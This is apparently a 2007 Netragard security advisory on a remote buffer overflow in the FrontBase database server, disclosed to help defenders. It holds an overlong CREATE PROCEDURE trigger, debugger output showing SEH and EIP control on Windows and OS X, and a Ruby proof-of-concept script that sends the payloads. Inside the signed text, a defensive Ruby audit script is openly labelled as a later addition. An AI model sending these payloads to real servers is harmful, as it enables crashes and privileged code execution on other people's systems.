
[NETRAGARD-20070316 SECURITY ADVISORY][FrontBase Database <= 4.2.7 ALL PLATFORMS][REMOTE BUFFER OVERFLOW CONDITION][LEVEL: EASY][RISK:MEDIUM]



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard,  L.L.C  Advisory ********************
                        
                     Strategic Reconnaissance Team


              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."




[Advisory Information]
- -----------------------------------------------------------------------
Contact                         : Adriel T. Desautels
Researcher                      : Kevin Finisterre
Advisory ID                     : NETRAGARD-20070316
Product Name                    : FrontBase Relational Database Server
Product Version                 : <= FrontBase 4.2.7 (All Platforms)
Vendor Name                     : FrontBase, Inc.
Type of Vulnerability           : Remote Buffer Overflow
Effort                          : Easy





[POSTING NOTICE]
- -----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

<a href=http://www.netragard.com/html/recent_research.html>
Netragard Research
</a>





[About Netragard]
- -----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products,
Security Appliances, Network Appliances, and Web Applications commonly
found in businesses internationally. We apply the knowledge gained by
performing this research to our professional security services. This
in turn enables us to produce high quality deliverables that are the
product of talented security professionals and not those of automated
scanners and tools.  This advisory is the product of research done by
the Strategic Reconnaissance Team.






[Product Description]
- -----------------------------------------------------------------------
"FrontBase is the only enterprise level relational database server that
was created in the Internet age, by Internet professionals specifically
to meet and exceed the demands of today's new economy."

- -- http://www.frontbase.com/  --





[Technical Summary]
- -----------------------------------------------------------------------

Any user with access to the FrontBase SQL command prompt and sufficient
privileges to create a stored procedure may be able to exploit a buffer
overflow condition in the parsing of 'CREATE PROCEDURE' SQL requests.
Successful exploitation may result in arbitrary code execution or a
denial of service condition.





[Technical Details]
- -----------------------------------------------------------------------
An exploitable vulnerability exists in FrontBase that can be used to
gain NT AUTHORITY\SYSTEM or root privileges on an affected system.  This
vulnerability exists within the creation of stored procedures. If a user
creates a procedure with a very long name, FrontBase will crash due to
memory corruption. Memory can be corrupted in such a way that an attacker
can run arbitrary code.

The following example buffer can be used to trigger the vulnerability:

create procedure
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
....
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"()
begin
end;

Upon parsing the final ';' in the statement the database will trigger an
exception and crash.

Example:
FrontBase currently runs on the following variety of platforms:

Mac OS X Server 10.x
Mac OS X Server 1.2
RedHat
SuSE
YellowDog Linux
Debian Linux
Mandrake Linux
FreeBSD
Solaris
HP-UX
Windows  Windows NT
Windows 2000

Below are a few examples of debugger output which highlight the bug.

On the Windows platform one of two things is possible. First, we can
overwrite the SEH handler with an address of our choosing. Because we
also overwrite EDI when we smash the SEH, we will trigger an exception.
This enables us to inject a malicious exception handler.

EAX 00000000
ECX FFFFFFFF
EDX 01863214
EBX 01863484
ESP 0196F344
EBP 018666D8
ESI 01863E0C
EDI 41414141
EIP 0043BE6D FrontBas.0043BE6D

SEH chain of thread 00000D3C
Address    SE handler
0196FFA4   04030201


The other option on Windows is to simply overwrite the EIP address.
This method may not be as straightforward due to limited register
control. It may be possible to jump into ESP and make use of a small
7 byte buffer as leverage to reach the attacker's shellcode of choice.

EAX 01863E0C
ECX 0099FD30
EDX 0099FD30
EBX 00000121
ESP 0196F480
EBP 00000000
ESI 01863484
EDI 018666A4
EIP 44434241

0196F478   41414141
0196F47C   44434241
0196F480   04030201  <---- Value at ESP  (4 bytes)
0196F484   5F070605  <---- Value at ESP  (3 bytes)


Under OSX we appear to smash the saved return address and its accompanying
frame. We also seem to have some control over the first frame as well.

k-s-computer-:/Users/kf root# gdb /Library/FrontBase/bin/FrontBase -q
Reading symbols for shared libraries .... done
(gdb) r newDB
Starting program: /Library/FrontBase/bin/FrontBase newDB
Reading symbols for shared libraries . done
2007-03-12 12:01:25 License problem detected:
Using the unlicensed FREE version options
2007-03-12 12:01:25 FrontBase Server - 4.2.7 on Mac OS X [Server]
2007-03-12 12:01:25 Transaction Log disabled

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x44434335
[Switching to process 2468 thread 0x2003]
0x000c6688 in ?? ()
(gdb) bt
#0  0x000c6688 in ?? ()
#1  0x41414141 in ?? ()
(gdb) x/i $eip
0xc6688:        mov    %edx,244(%eax)
(gdb) i r
eax            0x44434241       1145258561
ecx            0x0      0
edx            0x486690 4744848
ebx            0x4886d0 4753104
esp            0xb02f3290       0xb02f3290
ebp            0xb02f32d8       0xb02f32d8
esi            0x44434241       1145258561
edi            0xb02f3334       -1339083980
eip            0xc6688  0xc6688
eflags         0x10286  66182
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x37     55
(gdb) i f
Stack level 0, frame at 0xb02f3294:
 eip = 0xc6688; saved eip 0x41414141
 called by frame at 0x41414149
 Arglist at 0xb02f328c, args:
 Locals at 0xb02f328c, Previous frame's sp is 0xb02f3294
 Saved registers:
  ebp at 0xb02f328c, eip at 0xb02f3290
(gdb) frame 1
#1  0x41414141 in ?? ()
(gdb) i r
eax            0x44434241       1145258561
ecx            0x0      0
edx            0x486690 4744848
ebx            0x4886d0 4753104
esp            0xb02f3294       0xb02f3294
ebp            0x41414141       0x41414141
esi            0x44434241       1145258561
edi            0xb02f3334       -1339083980
eip            0x41414141       0x41414141
eflags         0x10286  66182
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x37     55





[Proof Of Concept]
- -----------------------------------------------------------------------

#!/usr/bin/ruby

require "frontbase"

connection = FBSQL_Connect.connect("192.168.0.6", -1, "newDB", "_system", "", "", "")

# Windows XP Sp2 - SEH hit.
b00m = 'create procedure "' + 'A'*3115 + "\x01\x02\x03\x04" + '"() ' + 'begin ' + 'end;'

# Windows XP Sp2 - EIP hit and control of data at ESP.
# b00m = 'create procedure "' + 'A'*255 + "ABCD" + "\x01\x02\x03\x04\x05\x06\x07" + '"() ' + 'begin ' + 'end;'

# OSX 10.4.8 control of EAX and ESI in frame 0, control of EAX EBP ESI and EIP in frame 1
# b00m = 'create procedure "' + 'A'*291 + "0123" + "ABCD" + '"() ' + 'begin ' + 'end;'   # OSX  - x86

connection.exec(b00m)





[Vendor Status]
- -----------------------------------------------------------------------
Vendor Notified on 03/08/07
Vendor Patched on 03/09/07
Vendor has stated the following:

Thx. for the report, the bug has been fixed and the fix will be in the
next general release. An error like this will be generated: Syntax error
005. The length of a regular identifier is not to exceed 128 characters.
Exception 363 (40:000). Transaction rollback.
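
The following is an added example, not part of the original advisory and
not FrontBase or Netragard code. For servers that cannot be upgraded right
away, it audits SQL text for 'CREATE PROCEDURE' names longer than the
128-character identifier limit quoted in the vendor statement. The function
names, the regular expression and the sample statements are assumptions
made for illustration, and the limit is applied to quoted and bare names
alike.

```ruby
# Added example: flag CREATE PROCEDURE names longer than the identifier
# limit quoted in the vendor's reply.
MAX_IDENTIFIER_LEN = 128 # limit taken from the vendor statement

# CREATE PROCEDURE followed by a delimited name ("..." with "" as an escaped
# quote, possibly unterminated) or a bare name ending at whitespace or "(".
CREATE_PROC = /\bcreate\s+procedure\s+(?:"((?:[^"]|"")*)"?|([^\s("]+))/i

# Returns one finding per CREATE PROCEDURE whose name exceeds the limit.
def oversized_procedure_names(sql, limit = MAX_IDENTIFIER_LEN)
  findings = []
  sql.scan(CREATE_PROC) do |quoted, bare|
    offset = Regexp.last_match.begin(0) # read before gsub touches $~
    name = quoted ? quoted.gsub('""', '"') : bare
    next if name.length <= limit
    # Keep only a short preview so the oversized name never reaches the log.
    findings << { offset: offset, length: name.length, preview: name[0, 16] }
  end
  findings
end

# Constructed sample statements (not from a real server or log).
SAMPLE_STATEMENTS = [
  'create procedure "get_orders"() begin end;',         # normal name
  %(CREATE  PROCEDURE\n"#{'a' * 300}"() begin end;),    # quoted, 300 chars
  'create procedure ' + 'p' * 129 + '() begin end;',    # bare, one over
  %(create procedure "#{'q' * 128}"() begin end;),      # exactly at limit
  %(create procedure "#{'z' * 200})                     # unterminated quote
].freeze

# Runs the check over a batch and tags each finding with its statement index.
def audit(statements)
  statements.each_with_index.flat_map do |sql, i|
    oversized_procedure_names(sql).map { |f| f.merge(statement: i) }
  end
end

if __FILE__ == $PROGRAM_NAME
  audit(SAMPLE_STATEMENTS).each do |f|
    puts "statement #{f[:statement]}: procedure name of #{f[:length]} " \
         "chars exceeds limit of #{MAX_IDENTIFIER_LEN}"
  end
end
```

A check of this kind belongs in front of the server, for example in a query
log review or an application-side pre-check, and does not replace the
vendor fix.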





[Disclaimer]
- ----------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com">
http://www.netragard.com
</a>




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFF+wHiQwbn1P9Iaa0RAiJ3AJ4jAGglza+4PuH5P1PF3z2ebpZ/GgCbBxSs
2gpgltsr3ugv8xi52xj7cx4=
=c9QZ
-----END PGP SIGNATURE-----